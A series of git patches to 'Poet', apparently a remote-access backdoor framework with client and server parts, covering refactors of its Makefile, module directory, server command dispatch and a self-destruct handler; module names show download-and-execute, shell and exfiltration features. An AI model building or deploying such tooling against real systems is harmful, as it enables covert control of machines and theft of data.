From 86eaf19548ca2740443e4882dfd5ea2a3fcf4b87 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Sun, 26 Jul 2015 10:54:39 -0400 Subject: [PATCH 1/7] selfdestruct: remove exception, rename No need to catch the exception again here, because the module framework itself catches all errors thrown by modules. --- common/modules/selfdestruct.py | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/common/modules/selfdestruct.py b/common/modules/selfdestruct.py index 451eb82..650de92 100644 --- a/common/modules/selfdestruct.py +++ b/common/modules/selfdestruct.py @@ -30,10 +30,7 @@ def server(server, argv): @module.client_handler(MODNAME) -def client(server, argv): - try: - server.selfdestruct() - server.s.send('boom') - sys.exit() - except Exception as e: - server.s.send(str(e.message)) +def client(client, argv): + client.selfdestruct() + client.s.send('boom') + sys.exit() From 882175afea0e2c35e2b223e15feb195a005f7d42 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Sun, 26 Jul 2015 18:25:36 -0400 Subject: [PATCH 2/7] Add comment about changing auth token --- common/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/common/config.py b/common/config.py index 713c8b5..22ba104 100644 --- a/common/config.py +++ b/common/config.py @@ -2,7 +2,7 @@ # Poet Configurations # -# client authentication token +# default client authentication token. change this to whatever you want! AUTH = 'b9c39a336bb97a9c9bda2b82bdaacff3' # directory to save output files to From d0cdf13a397e313c8058d97471227e3719cba00b Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Sun, 26 Jul 2015 18:29:22 -0400 Subject: [PATCH 3/7] Rename common/ to poet/, make Makefile flexible --- Makefile | 31 ++++++++++++------------ {common => poet}/config.py | 0 {common => poet}/debug.py | 0 {common => poet}/module.py | 0 {common => poet}/modules/__init__.py | 0 {common => poet}/modules/chint.py | 0 {common => poet}/modules/dlexec.py | 0 {common => poet}/modules/exec.py | 0 {common => poet}/modules/exfil.py | 0 {common => poet}/modules/selfdestruct.py | 0 {common => poet}/modules/shell.py | 0 {common => poet}/modules/template.py | 0 {common => poet}/poetsocket.py | 0 13 files changed, 16 insertions(+), 15 deletions(-) rename {common => poet}/config.py (100%) rename {common => poet}/debug.py (100%) rename {common => poet}/module.py (100%) rename {common => poet}/modules/__init__.py (100%) rename {common => poet}/modules/chint.py (100%) rename {common => poet}/modules/dlexec.py (100%) rename {common => poet}/modules/exec.py (100%) rename {common => poet}/modules/exfil.py (100%) rename {common => poet}/modules/selfdestruct.py (100%) rename {common => poet}/modules/shell.py (100%) rename {common => poet}/modules/template.py (100%) rename {common => poet}/poetsocket.py (100%) diff --git a/Makefile b/Makefile index 0ff9d18..5e2530d 100644 --- a/Makefile +++ b/Makefile @@ -1,4 +1,5 @@ -COMMON = $(wildcard common/*.py common/modules/*.py) +DIR = poet +COMMON = $(wildcard $(DIR)/*.py $(DIR)/modules/*.py) COMMON := $(subst py,pyo,$(COMMON)) OUT = bin/ bin/poet-client bin/poet-server @@ -11,26 +12,26 @@ PYCC = python2.7 -OO -m py_compile default: $(OUT) -# for debugging, just place the main files into the common/ directory, then +# for debugging, just place the main files into the $(DIR)/ directory, then # cd into that directory and execute the client and server. can't debug # "production" builds because debug info is stripped from them dbg: - cp client.py common - cp server.py common - ls -1 common/modules |grep -Ev 'py[oc]' |grep -v __init__ > common/modindex.txt + cp client.py $(DIR) + cp server.py $(DIR) + ls -1 $(DIR)/modules |grep -Ev 'py[oc]' |grep -v __init__ > $(DIR)/modindex.txt bin: mkdir -p $@ bin/poet-client: client.pyo $(COMMON) # main file needs to be named __main__.py(c/o) for zip file packaging to work - cp $< common/__main__.pyo + cp $< $(DIR)/__main__.pyo # create module index file, so client/server know what to load at runtime - ls -1 common/modules |grep -v pyo |grep -v __init__ > common/modindex.txt + ls -1 $(DIR)/modules |grep -v pyo |grep -v __init__ > $(DIR)/modindex.txt # zip everything up. -r : zip file destination - cd common && $(ZIP) -r ../$@ *.pyo modindex.txt modules/*.pyo + cd $(DIR) && $(ZIP) -r ../$@ *.pyo modindex.txt modules/*.pyo # get rid of auto-appended .zip extension mv $@.zip $@ @@ -45,9 +46,9 @@ bin/poet-client: client.pyo $(COMMON) bin/poet-server: server.pyo $(COMMON) # exact same stuff as above - cp $< common/__main__.pyo - ls -1 common/modules |grep -v pyo |grep -v __init__ > common/modindex.txt - cd common && $(ZIP) -r ../$@ *.pyo modindex.txt modules/*.pyo + cp $< $(DIR)/__main__.pyo + ls -1 $(DIR)/modules |grep -v pyo |grep -v __init__ > $(DIR)/modindex.txt + cd $(DIR) && $(ZIP) -r ../$@ *.pyo modindex.txt modules/*.pyo mv $@.zip $@ mv $@ .tmp echo "#!/usr/bin/env python2.7" > $@ @@ -61,10 +62,10 @@ bin/poet-server: server.pyo $(COMMON) clean: rm -rf bin rm -f *.pyo - rm -f common/__main__.py common/modindex.txt - rm -f common/client.py common/server.py - rm -f common/*.pyo common/*.pyc - rm -f common/modules/*.pyo common/modules/*.pyc + rm -f $(DIR)/__main__.py $(DIR)/modindex.txt + rm -f $(DIR)/client.py $(DIR)/server.py + rm -f $(DIR)/*.pyo $(DIR)/*.pyc + rm -f $(DIR)/modules/*.pyo $(DIR)/modules/*.pyc squeaky: $(MAKE) clean diff --git a/common/config.py b/poet/config.py similarity index 100% rename from common/config.py rename to poet/config.py diff --git a/common/debug.py b/poet/debug.py similarity index 100% rename from common/debug.py rename to poet/debug.py diff --git a/common/module.py b/poet/module.py similarity index 100% rename from common/module.py rename to poet/module.py diff --git a/common/modules/__init__.py b/poet/modules/__init__.py similarity index 100% rename from common/modules/__init__.py rename to poet/modules/__init__.py diff --git a/common/modules/chint.py b/poet/modules/chint.py similarity index 100% rename from common/modules/chint.py rename to poet/modules/chint.py diff --git a/common/modules/dlexec.py b/poet/modules/dlexec.py similarity index 100% rename from common/modules/dlexec.py rename to poet/modules/dlexec.py diff --git a/common/modules/exec.py b/poet/modules/exec.py similarity index 100% rename from common/modules/exec.py rename to poet/modules/exec.py diff --git a/common/modules/exfil.py b/poet/modules/exfil.py similarity index 100% rename from common/modules/exfil.py rename to poet/modules/exfil.py diff --git a/common/modules/selfdestruct.py b/poet/modules/selfdestruct.py similarity index 100% rename from common/modules/selfdestruct.py rename to poet/modules/selfdestruct.py diff --git a/common/modules/shell.py b/poet/modules/shell.py similarity index 100% rename from common/modules/shell.py rename to poet/modules/shell.py diff --git a/common/modules/template.py b/poet/modules/template.py similarity index 100% rename from common/modules/template.py rename to poet/modules/template.py diff --git a/common/poetsocket.py b/poet/poetsocket.py similarity index 100% rename from common/poetsocket.py rename to poet/poetsocket.py From 62c7c1620ae321bdee84aa2a75457a1737239335 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Thu, 30 Jul 2015 00:50:04 -0400 Subject: [PATCH 4/7] Cover unaddressed edge case If the HTTP GET for the /style.css goes through but for some reason the response isn't 200 (this should never happen), still return False --- client.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/client.py b/client.py index 64ebb9c..2b7a700 100644 --- a/client.py +++ b/client.py @@ -158,6 +158,8 @@ def is_active(host, port): f = urllib2.urlopen(req) if f.code == 200: return True + # shouldn't get here + return False except urllib2.URLError: return False From be471643ad7b4b7c6300127d27158fc2c4f19f62 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Wed, 19 Aug 2015 21:46:10 -0400 Subject: [PATCH 5/7] Fix Testing.mk to use poet/ instead of common/ --- Testing.mk | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Testing.mk b/Testing.mk index a5f5410..77d0148 100644 --- a/Testing.mk +++ b/Testing.mk @@ -11,8 +11,8 @@ DELAY = 1 PORT = -p 8081 PYTHON = python2.7 -CL = common/client.py -SV = common/server.py +CL = poet/client.py +SV = poet/server.py # debug mode helpers From 7dcf8b94d27363f834c05b8bf5bb8419b28784a5 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Sun, 15 Nov 2015 00:54:31 -0500 Subject: [PATCH 6/7] Dude, it's a hashtable --- server.py | 58 ++++++++++++++++++++++++++----------------------------- 1 file changed, 27 insertions(+), 31 deletions(-) diff --git a/server.py b/server.py index 79407c8..782d368 100644 --- a/server.py +++ b/server.py @@ -52,8 +52,11 @@ class PoetServer(object): def __init__(self, s): self.s = s self.conn = None - self.builtins = ['exit', 'help'] - # exists so modules can stop server (used by selfdestruct) + self.builtins = { + 'exit': self._builtin_exit, + 'help': self._builtin_help + } + # exists so modules can stop server (used by selfdestruct and exit) self.continue_ = True def start(self): @@ -65,40 +68,24 @@ def start(self): print 'Running `help\' will give you a list of supported commands.' while True: try: - found = False + # found = False argv = raw_input(POSH_PROMPT).split() - - # - # builtins - # - - if argv == []: + if not argv: continue - if argv[0] == 'exit': - break - elif argv[0] == 'help': - found = True - print 'Commands:\n {}'.format('\n '.join(sorted(self.builtins + module.server_commands.keys()))) - - # - # modules - # - - # try to find command in registered modules - for cmd, func in module.server_commands.iteritems(): - if argv[0] == cmd: - found = True - try: - func(self, argv) - except Exception as e: - self.info(str(e.args)) + + if argv[0] in self.builtins: + self.builtins[argv[0]](argv) + elif argv[0] in module.server_commands: + try: + module.server_commands[argv[0]](self, argv) + except Exception as e: + self.info(str(e.args)) + else: + self.info('{}: command not found'.format(argv[0])) # see comment above for self.continue_ for why this is here if not self.continue_: - return - - if not found: - self.info('{}: command not found'.format(argv[0])) + break except KeyboardInterrupt: print continue @@ -194,6 +181,15 @@ def exec_preproc(self, inp): del tmp[1] tmp = ' '.join(tmp) return tmp, write_flag, write_file + + def _builtin_exit(self, argv): + self.continue_ = False + + def _builtin_help(self, argv): + print 'Builtins:\n {}'.format('\n '.join(sorted(self.builtins.keys()))) + print + print 'Commands:\n {}'.format('\n '.join(sorted(module.server_commands.keys()))) + def get_args(): From c248fa370aaa8a31aad0a2498fad684f091eb939 Mon Sep 17 00:00:00 2001 From: Mark Mossberg Date: Sun, 15 Nov 2015 14:01:46 -0500 Subject: [PATCH 7/7] Minor --- server.py | 1 - 1 file changed, 1 deletion(-) diff --git a/server.py b/server.py index 782d368..7da98aa 100644 --- a/server.py +++ b/server.py @@ -68,7 +68,6 @@ def start(self): print 'Running `help\' will give you a list of supported commands.' while True: try: - # found = False argv = raw_input(POSH_PROMPT).split() if not argv: continue